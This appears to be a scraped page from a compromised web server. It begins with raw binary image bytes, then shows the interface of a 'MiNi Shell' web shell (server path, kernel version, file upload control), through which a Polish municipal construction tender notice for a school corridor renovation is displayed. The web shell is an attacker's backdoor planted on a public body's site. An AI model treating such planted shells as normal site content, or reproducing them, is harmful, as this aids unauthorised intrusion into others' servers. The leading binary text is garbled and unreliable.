JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220603/0019260701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja korytarza przy świetlicy wraz z wymianą stolarki drzwiowej szt. 13 w budynku Szkoły Podstawowej w Zespole Szkolno-Przedszkolnym przy ul. Piaseckiego 2 w Otrębusach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Brwinów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brwinów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 22 7382567</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 227295940</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">halina.bak@brwinow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">brwinow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja korytarza przy świetlicy wraz z wymianą stolarki drzwiowej szt. 13 w budynku Szkoły Podstawowej w Zespole Szkolno-Przedszkolnym przy ul. Piaseckiego 2 w Otrębusach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93e57117-e30d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00192607</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugb.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugb.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu<br/>Zamawiający oferty, oświadczenia, o których mowa w art. 125 ust.1 Pzp, podmiotowe środki dowodowe, w tym oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o<br/>zamówienia /art. 117 ust. 4 Pzp/, oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe,<br/>pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art.<br/>18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>2. Komunikacja elektroniczna w zakresie przekazywania sobie przez strony postępowania informacji, oświadczeń, wniosków,<br/>zawiadomień - za pośrednictwem Platformy zakupowej znajdującej się pod adresem: https://ugb.ezamawiajacy.pl w zakładce<br/>„Korespondencja”.<br/>3. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>wyznaczonym terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu informacji,<br/>oświadczeń, wniosków, zawiadomień przyjmuje się datę ich złożenia na Platformie zakupowej.<br/>4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem<br/>Platformy Zakupowej Przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu,<br/>Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka<br/>Wykonawca klika klawisz POTWIERDŹ, Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy<br/>&#34;pytanie wysłane&#34;.<br/>4.1. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania odpowiednio<br/>ofert, pod warunkiem że wniosek o wyjaśnienie treści odpowiednio SWZ wpłynął do zamawiającego nie później niż na 4 dni przed<br/>upływem terminu składania odpowiednio ofert.<br/>4.2. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w ust. 4.1, przedłuża termin składania odpowiednio ofert o<br/>czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego<br/>przygotowania i złożenia odpowiednio ofert.<br/>4.3. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w ust. 4.1, Zamawiający nie ma<br/>obowiązku udzielania odpowiednio wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania odpowiednio ofert.<br/>4.4. Przedłużenie terminu składania ofert, o których mowa w ust. 5.1, nie wpływa na bieg terminu składania wniosku o wyjaśnienie<br/>treści odpowiednio SWZ.<br/>5. Treść pytań wraz z wyjaśnieniami, bez ujawniania źródła zapytania, informacje o dokonaniu modyfikacji SWZ, Zamawiający<br/>udostępnia na Platformie Zakupowej.<br/>6. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej tj.:<br/>6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>6.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>6.3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>6.4. Włączona obsługa JavaScript;<br/>6.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf.<br/>7. W przypadku zastosowania kwalifikowanego podpisu elektronicznego Zamawiający określa dopuszczalny format, jako:<br/>7.1. dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Gmina Brwinów, reprezentowana przez Burmistrza Gminy Brwinów z siedzibą w Brwinowie, ul. Grodziska 12, 05-840 Brwinów, adres e-mail: brwinow@brwinow.pl,<br/>•	inspektor ochrony danych osobowych w Urzędzie Gminy Brwinów: tel. 22 738 25 69 lub adres e-mail: iod@brwinow.pl,<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego prowadzonego w trybie podstawowym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. poz. 2019 ze zm.), dalej „ustawa Pzp”;<br/>•	Pani/Pana dane osobowe mogą być przetwarzane w związku z realizacją i rozliczeniem umowy dotacyjnej. Przekazanie danych osobowych do instytucji dotujących dotyczyć może wyłącznie danych niezbędnych do prawidłowego wykonania i rozliczenia umowy dotacyjnej; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.,<br/>•	odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Urzędu Gminy Brwinów oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy <br/>ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Brwinów prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://ugb.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.47.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane polegające na: modernizacji korytarza przy świetlicy wraz z wymianą stolarki drzwiowej szt. 13 w budynku Szkoły Podstawowej w Zespole Szkolno-Przedszkolnym przy ul. Piaseckiego 2 w Otrębusach<br/><br/>2. Zakres rzeczowy przedmiotu umowy obejmuje wykonanie wszystkich robót zgodnie <br/>z dokumentacją wymienioną w ust. 4, sztuką budowlaną i inżynierską, technologią wykonywania robót, a w szczególności:<br/>1) w branży budowlanej:<br/>a)	wymianę sufitu w postaci dwóch płyt gipsowo-kartonowych, w tym ppoż, wykonanie gładzi,<br/>b) naprawę uszkodzonych tynków ścian, ługowanie starych powłok, przecieranie tynków, usunięcie nierówności, obsadzenie listew tynkarskich na narożach, gruntowanie, wykonanie gładzi,<br/>c)	dwukrotne malowanie sufitu i ścian powyżej lamperii farbą antyalergiczną,<br/>d)	wykonanie lamperii z tynku mozaikowego do wysokości 150 cm,<br/>e)	renowację istniejących drewnianych cokołów przyściennych (szlifowanie, gruntowanie, malowanie),<br/>f)	naprawę dylatacji w ścianie przez wyprofilowanie dylatacji, wtopienie profilu dylatacyjnego pod tynkiem, wypełnienie szczeliny akrylową masą elastyczną,<br/>g) wymianę dwóch wyłazów stropowych na wyłazy 70x130 cm, ppoż, z systemowymi schodami składanymi i klapami, wykonanie podkonstrukcji drewnianej w postaci wymianów,<br/>h)	wymianę drzwi zewnętrznych jednoskrzydłowych, na aluminiowe, z poszerzeniem otworów drzwiowych i wykonaniem nadproży - łącznie szt. 4, w tym jednoskrzydłowe szt. 2 i dwuskrzydłowe ewakuacyjne szt. 2,<br/>i)	wymianę drzwi wewnętrznych przesuwnych, na aluminiowe jednoskrzydłowe, z likwidacją naświetla nad drzwiami przez zamurowanie oraz wykonaniem nadproża – szt. 1,<br/>j)	wymianę drzwi wewnętrznych jednoskrzydłowych, na aluminiowe, z poszerzeniem otworów – szt. 4,<br/>k)	wymianę drzwi wewnętrznych jednoskrzydłowych, na drzwi w okleinie CPL – szt. 3,<br/>l)	wymianę drzwi wewnętrznych dwuskrzydłowych, na aluminiowe – szt. 1,<br/>m)	dostawę i montaż odbojów ściennych i podłogowych,<br/>n)	renowację istniejących osłon grzejnikowych,<br/>o)	wymianę kratki wentylacyjnej na stalową powlekaną,<br/>p)	dostawę i montaż narożników ochronnych PCV,<br/>q)	prace przygotowawcze i zabezpieczające,<br/>r)	demontaż i jeśli przewidziany ponowny montaż istniejącego wyposażenia,<br/>s)	dostawę i montaż oznakowań,<br/>2) w branży sanitarnej<br/>a)	wymianę grzejników na aluminiowe żeberkowe,<br/>b) wymianę zaworów,<br/>c)	dostawę i montaż odpowietrzników automatycznych na pionie c.o., głowic termostatycznych,<br/>d)	oczyszczenie gałązek i pionów c.o. ze starej farby oraz malowanie, <br/>3) w branży elektrycznej<br/>a)	wymianę instalacji oświetlenia w korytarzu,<br/>b)	wymianę opraw oświetlenia podstawowego na LED i osprzętu w korytarzu, <br/>c)	wymianę instalacji gniazd wtykowych i osprzętu w korytarzu,<br/>d)	wykonanie instalacji oświetlenia awaryjnego i ewakuacyjnego wraz z osprzętem i oprawami w korytarzu,<br/>e)	wykonanie instalacji oświetleniowej, gniazd wtykowych, gniazd wtykowych komputerowych w korytarzu, służącej do zasilania przyległych z korytarza pomieszczeń tj. rozprowadzenie ww. instalacji w korycie nad sufitem w korytarzu, wykonanie przebić w ścianie nad sufitem do poszczególnych sal, obsadzenie przelotowych puszek i zakończenie instalacji do późniejszej rozbudowy, <br/>f)	wykonanie instalacji internetowej w korytarzu oraz doprowadzenie jej do sal,<br/>g)	zasilenie instalacji z rozdzielni, wykonanie zabezpieczeń w rozdzielni,<br/>Uwaga: rozprowadzenie poziome instalacji w korycie metalowym nad sufitem, pionowo podtynkowo, istniejące instalacje do wykorzystania należy ukryć pod tynkiem,<br/>4) wykonanie prac budowlanych związanych z poszerzeniem otworów drzwiowych i wymianą stolarki drzwiowej:<br/>a)	naprawa posadzki wewnątrz i na zewnątrz: uzupełnienie podkładu, zerwanie i odtworzenie fragmentu posadzki (PCV, gres, lastriko),<br/>b)	naprawa i wykończenie: glifów oraz fragmentów ścian od strony pomieszczeń i na elewacji,<br/>5) przeprowadzenie kabla światłowodowego typu MM OM3 uniwersalny 4x50/125/250 um, luźna tuba, żel, ULSZH – PN 8-1593093-1, spoza remontowanego korytarza nad sufitem kasetonowym, w remontowanym korytarzu nad sufitem projektowanym. Łączna droga kabla do 150 m, długość kabla do 170 m,<br/>6) uporządkowanie terenu i utylizację materiałów porozbiórkowych,<br/>7) wykonanie dokumentacji powykonawczej (2 egz.).<br/><br/>3. Wszystkie dostarczone urządzenia i materiały mają być fabrycznie nowe i spełniać wymagania oraz posiadać dokumenty określone w dokumentacji projektowej, specyfikacjach technicznych wykonania <br/>i odbioru robót.<br/><br/>4. Szczegółowy zakres robót będących przedmiotem umowy określa dokumentacja stanowiąca integralną część do umowy, na którą składają się: <br/>1) projekty techniczne /architektura, instalacje elektryczne, instalacje sanitarne/,<br/>2)	szczegółowe specyfikacje techniczne wykonania i odbioru robót - branża budowlana, elektryczna, sanitarna.<br/>5. Na wykonane roboty Wykonawca udziela 60-miesięcznej rękojmi za wady licząc od daty podpisania protokołu odbioru końcowego robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45223210-1 - Roboty konstrukcyjne z wykorzystaniem stali</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">44112220-6 - Podłogi z tworzyw sztucznych</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45232460-4 - Roboty sanitarne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert: <br/>1) cena - 60 %<br/>2) okres udzielonej gwarancji jakości - 40 %<br/><br/>2. Sposób obliczenia wartości punktowej oferty.<br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa/cena oferty badanej x 100 x 60 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej gwarancji jakości” obliczona według poniższego: <br/>gwarancja jakości minimalny okres	maksymalny okres	podkryterium<br/>razem 40 %	Wartość punktowa kryterium<br/>Stolarska drzwiowa	60 miesięcy <br/>(5 lat)	96 miesięcy<br/> (8 lat)	10 %	*<br/>Prace budowlane	60 miesięcy<br/>(5ta)	84 miesiące<br/>(7 lat)	30 %	*<br/>Razem	40 %	&lt;= 40%<br/>* Okres gwarancji oferty badanej / maksymalny okres gwarancji x 100 x n %<br/>W przypadku udzielenia gwarancji jakości na okres krótszy niż wymagany przez Zamawiającego minimalny okres (wg tabeli), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 